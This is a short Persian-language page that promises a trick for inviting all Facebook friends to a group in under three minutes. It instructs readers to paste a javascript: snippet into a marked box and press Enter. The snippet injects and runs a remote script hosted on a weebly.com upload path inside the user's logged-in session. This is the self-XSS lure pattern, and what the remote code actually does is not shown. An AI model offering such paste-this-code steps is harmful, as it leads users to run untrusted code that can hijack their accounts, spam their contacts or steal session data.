در حال بارگزاری....
دانلود

ترفند اضافه کردن تمام دوستان به گروه در فیسبوک کمتر از سه دقیقه-How to Invite All Facebook Friends to a Group

===طبق فیلم کد زیر را copy سپس در کادری که مشخص شده وارد می کنید و در آخر Enter رو می زنید

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://www.weebly.com/uploads/1/6/6/2/16628288/fb.club.js';})();